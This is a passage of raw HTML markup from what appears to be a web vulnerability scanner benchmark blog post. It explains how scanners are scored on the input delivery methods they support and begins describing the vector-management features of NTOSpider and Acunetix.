&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Reasoning&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;:
the &lt;b&gt;input delivery method&lt;/b&gt; (a.k.a the &lt;b&gt;input vector&lt;/b&gt;) is the method
used by the HTML/Flash/Applet/Silverlight application to &lt;b&gt;deliver&lt;/b&gt; &lt;b&gt;user-originating
input&lt;/b&gt; from the &lt;b&gt;client&lt;/b&gt; to the &lt;b&gt;server&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;These &quot;formats&quot; include common formats such as:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;&lt;i&gt;Query String Parameters&lt;/i&gt;&lt;/b&gt;
(URL?param1=value1&amp;amp;param2=value2)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;&lt;i&gt;HTTP Body &lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;Parameters&lt;/i&gt;&lt;/b&gt; (param1=value1&amp;amp;param2=value2)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;And &quot;modern&quot; formats such as:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;i&gt;JSON Arrays&lt;/i&gt;&lt;/b&gt; ({&quot;param1&quot;:&quot;value1&quot;,&quot;param2&quot;:&quot;value2&quot;})&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;&lt;i&gt;XML Elements and Attributes&lt;/i&gt;&lt;/b&gt; (&lt;tag attribute=&quot;value&quot;&gt;element value&lt;/tag&gt;)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;These methods may also include binary delivery methods for
technology specific objects such as AMF, Java serialized objects and WCF, as
well as many other input delivery methods.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Since the &lt;b&gt;&lt;u&gt;majority&lt;/u&gt; &lt;/b&gt;of attacks rely on &lt;b&gt;malicious
input&lt;/b&gt; being &lt;b&gt;delivered&lt;/b&gt; through &lt;b&gt;input parameters&lt;/b&gt; to the
application, a scanner that is not able to deliver those values to most of the
application server entry points &lt;b&gt;WILL NOT&lt;/b&gt; be a good choice. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;An automated tool can&#39;t detect vulnerabilities in a given
parameter, if it can&#39;t scan the protocol or mimic the application&#39;s method of
delivering the input.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;In fact, lack of support for the dominant input vector used
by the application can make the scanner &lt;b&gt;NEARLY USELESS &lt;/b&gt;for that &lt;b&gt;&lt;u&gt;specific
application&lt;/u&gt; &lt;/b&gt;(without demoting how useful it may be for other types of
applications).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent4; mso-background-themetint: 153; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;While organizations that stick with specific development
  technologies &lt;b&gt;only need&lt;/b&gt; to &lt;b&gt;verify&lt;/b&gt; that the scanner they use &lt;b&gt;supports&lt;/b&gt;
  the input delivery method used by their applications, since in 2013/2014
  there is a vast collection of different input delivery methods, &lt;b&gt;versatility&lt;/b&gt;
  becomes a &lt;b&gt;major&lt;/b&gt; issue for pentesters, and to some extent for
  organization that rapidly develop applications in different technologies. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Although the position in this section charts &lt;b&gt;don&#39;t&lt;/b&gt;
  necessarily &lt;b&gt;represent&lt;/b&gt; the &lt;b&gt;most important score&lt;/b&gt;, it is the &lt;b&gt;most
  important perquisite&lt;/b&gt; for the scanner to comply with when scanning a
  specific technology.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Therefore, the first assessment criterion of this benchmark
is the &lt;b&gt;number&lt;/b&gt; of input vectors each tool &lt;b&gt;can scan&lt;/b&gt; (not just
parse), which is a major component in the scanner versatility score.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Important Note&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Although, it may seem logical that a scanner that supports
an input delivery method will do so &lt;b&gt;consistently&lt;/b&gt;, some scanners support
for an input vector may be &lt;b&gt;limited&lt;/b&gt; to &lt;b&gt;SOME&lt;/b&gt; of the vulnerability
detection plugins, while the rest may be supported only for basic input
delivery methods.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;I became aware of this condition after a thorough research,
and unfortunately, at the moment there is &lt;b&gt;no sure way&lt;/b&gt; to verify which detection
capabilities of scanners are actually supported for each input vector, at least
not on a large scale, and for the vast majority of scanners.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Since WAVSEP test cases are implemented with either query string
or HTTP body parameters, only the support for these vectors was actually
verified, and the rest of the information in this section derives from a
thorough research that covered the vendor proclaimed results, source code (when
possible) and feature documentation.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Future versions of WAVSEP may include test cases to verify
the support of scanners for different input vectors.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #000000; border-collapse: collapse; border: none; mso-background-themecolor: accent1; mso-background-themetint: 102; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Before viewing the charts that represent the versatility
  of different vulnerability scanners, it may be a good time to mention &lt;b&gt;interesting
  features&lt;/b&gt; of two products which are related to this category.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;This proclamation does not mean that the author takes a
  stand as to which product is &quot;the best&quot; (a conclusion that anyone
  who read my previous benchmarks knows very well not to expect), just that the
  approach these products take to &lt;b&gt;classify&lt;/b&gt; attacks, &lt;b&gt;manage scan scope&lt;/b&gt;
  and &lt;b&gt;present&lt;/b&gt; the information to the user can be very beneficial in many
  situations.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The products I refer to are &lt;b&gt;NTOSpider&lt;/b&gt; and &lt;b&gt;Acunetix&lt;/b&gt;,
  and to some extent &lt;b&gt;IronWASP&lt;/b&gt;, &lt;b&gt;ZAP&lt;/b&gt; and &lt;b&gt;Burp&lt;/b&gt; (and products
  with similar features, in case I forgot any), each taking an interesting
  approach to &lt;b&gt;input vector support&lt;/b&gt; and &lt;b&gt;scan scope&lt;/b&gt; management:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;NTOSpider&lt;/b&gt; enables the user to manage which
  input vectors should be tested for each attack, therefore presenting which vectors
  are supported &lt;b&gt;for each attack&lt;/b&gt;, information which is very hard to
  obtain from documentation:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg481DVHdwJiW7Srf303IcfuL0lCFnt1rFE9jFRBhMZLAGPhHszELcqWNXiEikiJUjfLD3rR7qHqe603OX574d34gOkuJKBcvs4Yxr3ZuLHom8x87nyFWBGy7WATMIZ6uP0Mhb6kkRdt9g/s1600/3%2529+NTOSpider+Input+Vectors.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg481DVHdwJiW7Srf303IcfuL0lCFnt1rFE9jFRBhMZLAGPhHszELcqWNXiEikiJUjfLD3rR7qHqe603OX574d34gOkuJKBcvs4Yxr3ZuLHom8x87nyFWBGy7WATMIZ6uP0Mhb6kkRdt9g/s1600/3%2529+NTOSpider+Input+Vectors.png&quot; height=&quot;111&quot; width=&quot;400&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape
   id=&quot;_x0000_i1025&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:415.5pt;height:115.5pt&#39;
   o:ole=&quot;&quot;&gt;
   &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image007.png&quot;
    o:title=&quot;&quot;/&gt;
  &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
   &lt;o:OLEObject Type=&quot;Embed&quot; ProgID=&quot;PBrush&quot; ShapeID=&quot;_x0000_i1025&quot;
    DrawAspect=&quot;Content&quot; ObjectID=&quot;_1453177923&quot;&gt;
   &lt;/o:OLEObject&gt;
  &lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*) &lt;b&gt;Acunetix&lt;/b&gt; presents which attacks are performed
  per directory, schema, file, etc:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Xk1INvzlxOroXABqI-YdSwKsoxdqgMsZztNAP1-73L8HTpn1h6CzhhAFGANID5pJZHYZR0tdO1bL_7i7IHO7emMSb9Y4616auXjvyv5aXekw0Pa3Eznl-_r7wZorCllqUfjcsBDL04M/s1600/4%2529+Acunetix+Input+Vectors.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Xk1INvzlxOroXABqI-YdSwKsoxdqgMsZztNAP1-73L8HTpn1h6CzhhAFGANID5pJZHYZR0tdO1bL_7i7IHO7emMSb9Y4616auXjvyv5aXekw0Pa3Eznl-_r7wZorCllqUfjcsBDL04M/s1600/4%2529+Acunetix+Input+Vectors.png&quot; height=&quot;262&quot; width=&quot;400&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;!--[if gte vml 1]&gt;&lt;v:shape
   id=&quot;_x0000_i1026&quot; type=&quot;#_x0000_t75&quot; style=&#39;width:392.25pt;height:258pt&#39;
   o:ole=&quot;&quot;&gt;
   &lt;v:imagedata src=&quot;file:///C:\Users\SHAY~1.CHE\AppData\Local\Temp\msohtmlclip1\01\clip_image009.png&quot;
    o:title=&quot;&quot;/&gt;
  &lt;/v:shape&gt;&lt;![endif]--&gt;&lt;!--[if !vml]--&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;
   &lt;o:OLEObject Type=&quot;Embed&quot; ProgID=&quot;PBrush&quot; ShapeID=&quot;_x0000_i1026&quot;
    DrawAspect=&quot;Content&quot; ObjectID=&quot;_1453177924&quot;&gt;
   &lt;/o:OLEObject&gt;
  &lt;/xml&gt;&lt;![endif]--&gt;&lt;/span&gt;&lt;span dir=&quot;RTL&quot; lang=&quot;HE&quot; style=&quot;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Arial; mso-bidi-theme-font: minor-bidi; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white; font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Other tools contained interesting features (with no
  attack-per-vector info) that provided control over &lt;b&gt;which&lt;/b&gt; input vectors
  will be scanned:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
